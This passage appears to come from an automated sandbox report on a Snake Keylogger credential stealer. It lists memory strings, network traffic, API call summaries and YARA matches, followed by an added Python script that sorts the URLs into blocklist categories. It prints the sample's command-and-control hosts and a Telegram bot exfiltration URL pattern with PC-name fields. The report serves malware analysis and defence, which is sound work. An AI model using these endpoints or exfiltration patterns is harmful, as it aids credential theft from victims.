                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002833000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://us2.smtp.mailhostbox.com
                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: RegSvcs.exe, 0000000D.00000002.3689181352.00000000027B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.000000000273F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000027C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.000000000266F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.000000000267F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000026EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.000000000267F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 0000000D.00000002.3689181352.00000000026AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.0000000002629000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.000000000266F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000026EF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000026AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: RegSvcs.exe, 0000000D.00000002.3689181352.00000000027E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.0000000002771000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000027F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
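The memory strings above mix three very different kinds of URL and should not all go into the same blocklist. The sample's own infrastructure is the set of three dynamic-DNS hosts and one bare IP, all on port 8081, with the /_send_.php endpoint. A second group is public services the sample abuses for IP lookup, geolocation and delivery (checkip.dyndns.org, reallyfreegeoip.org, api.telegram.org and us2.smtp.mailhostbox.com), which are worth an alert at the proxy but are not attacker-owned. The remainder are search-provider and new-tab URLs of the kind a Chromium profile keeps (Ecosia, DuckDuckGo, Yahoo, Google), which appear in RegSvcs.exe memory because the stealer reads browser data, plus the schemas.xmlsoap.org claims namespace that is a .NET framework constant. The Python below is an added example, not the report's code: it triages the strings with rules of my own (a bare IP, one of the assumed dynamic-DNS suffixes .duckdns.org, .dns.army or .kozow.com, or a non-standard port marks attacker infrastructure) and emits only host:port pairs that belong on a blocklist. The input list is copied from the report, including trailing junk such as "lB" or "$" that the string scan picked up.

```python
"""Triage the URLs found in this sample's memory into attacker
infrastructure, abused public services and browser-profile noise.

Added example, not code from the Joe Sandbox report. The classification
rules and the dynamic-DNS suffix list are my assumptions; the input strings
are copied from the report's 'String found in binary or memory' lines.
"""
import ipaddress
from urllib.parse import urlsplit

REPORT_STRINGS = [
    "http://51.38.247.67:8081/_send_.php?L",
    "http://aborters.duckdns.org:8081",
    "http://anotherarmy.dns.army:8081",
    "http://varders.kozow.com:8081",
    "http://checkip.dyndns.org/q",
    "http://us2.smtp.mailhostbox.com",  # report shows it used over SMTP on 587, not HTTP
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=",
    "https://reallyfreegeoip.org/xml/8.46.123.33$",
    "https://ac.ecosia.org/autocomplete?q=",
    "https://duckduckgo.com/chrome_newtab",
    "https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=",
    "https://www.google.com/images/branding/product/ico/googleg_lodp.ico",
    "https://www.office.com/lB",
    "https://chrome.google.com/webstore?hl=en",
]

# Public services the sample abuses; alert on them, but they are not attacker-owned.
ABUSED_SERVICES = {
    "checkip.dyndns.org", "reallyfreegeoip.org", "api.telegram.org", "us2.smtp.mailhostbox.com",
}
# Search-provider / new-tab URLs a Chromium profile keeps, plus other hosts assumed
# to come from the harvested browser data rather than from the malware's config.
BROWSER_PROFILE_HOSTS = {
    "ac.ecosia.org", "www.ecosia.org", "cdn.ecosia.org", "duckduckgo.com",
    "ch.search.yahoo.com", "www.google.com", "www.office.com", "chrome.google.com",
}
# Assumed free dynamic-DNS suffixes; extend with whatever your threat intel lists.
DDNS_SUFFIXES = (".duckdns.org", ".dns.army", ".kozow.com")


def classify(url):
    """Return host, port, scheme and a category for one URL string."""
    p = urlsplit(url.strip())
    host = p.hostname or ""
    port = p.port or (443 if p.scheme == "https" else 80)
    try:
        ipaddress.ip_address(host)
        is_ip = True
    except ValueError:
        is_ip = False

    if is_ip or host.endswith(DDNS_SUFFIXES) or port not in (80, 443):
        category = "c2_candidate"
    elif host in ABUSED_SERVICES:
        category = "abused_service"
    elif host in BROWSER_PROFILE_HOSTS:
        category = "browser_profile"
    elif host == "schemas.xmlsoap.org":
        category = "framework_constant"  # .NET ClaimTypes namespace, not network activity
    else:
        category = "unknown"
    return {"host": host, "port": port, "scheme": p.scheme, "category": category}


def triage(strings):
    """Group unique (host, port) pairs by category."""
    groups, seen = {}, set()
    for s in strings:
        rec = classify(s)
        key = (rec["host"], rec["port"])
        if key in seen:
            continue
        seen.add(key)
        groups.setdefault(rec["category"], []).append(key)
    return groups


def blocklist(strings):
    """host:port entries that are attacker infrastructure and safe to block outright."""
    return sorted(f"{h}:{p}" for h, p in triage(strings).get("c2_candidate", []))


if __name__ == "__main__":
    for category, entries in sorted(triage(REPORT_STRINGS).items()):
        print(category)
        for host, port in entries:
            print(f"  {host}:{port}")
    print("blocklist:", blocklist(REPORT_STRINGS))
```

Anything that lands in "unknown" needs a manual look before it is blocked; the two lists of known hosts are deliberately small so that new infrastructure falls through to that bucket rather than being silently ignored.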
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
                    Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
                    Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49739 version: TLS 1.2
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_0045A10F (listed twice)
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 2_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 2_2_0045A10F
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 12_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 12_2_0045A10F
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard, 0_2_0046DC80
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput, 0_2_0044C37A
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0047C81C
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 2_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 2_2_0047C81C
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 12_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 12_2_0047C81C

                    System Summary

                    Source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                    Source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                    Source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                    Source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                    Source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                    Source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                    Source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                    Source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                    Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                    Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                    Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                    Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                    Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                    Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                    Source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                    Source: Process Memory Space: name.exe PID: 788, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                    Source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle | 0_2_00431BE8
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_00446313
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState | 0_2_004333BE
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState | 2_2_004333BE
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 12_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState | 12_2_004333BE
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: String function: 004115D7 appears 36 times
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: String function: 00416C70 appears 39 times
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: String function: 00445AE0 appears 65 times
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 0040E710 appears 44 times
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 00401B10 appears 50 times
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 00408F40 appears 38 times
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 004301F8 appears 36 times
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 004115D7 appears 72 times
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 00416C70 appears 78 times
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 004181F2 appears 42 times
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 00445AE0 appears 130 times
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 0041341F appears 36 times
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 00422240 appears 38 times
                    Source: z1newpo.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | author = ditekSHen, description = Detects executables with potential process hoocking
